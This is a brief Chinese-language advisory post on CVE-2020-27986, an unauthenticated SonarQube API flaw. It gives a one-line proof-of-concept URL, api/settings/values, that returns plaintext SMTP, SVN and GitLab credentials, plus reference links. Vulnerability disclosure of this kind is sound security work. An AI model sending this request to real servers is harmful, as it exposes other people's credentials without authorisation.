CVE-2020-27986 SonarQube api 未授权访问

# CVE-2020-27986 SonarQube api 未授权访问

SonarQube配置不当造成未授权访问,可以通过api/settings/values获取明文SMTP、SVN和Gitlab等敏感信息

PoC:

http://[server]/api/settings/values

![](/static/lingjiao/media/16097308794889/16097308985770.jpg)

ref:

https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/

https://forum.ywhack.com/thread-114647-1-6.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容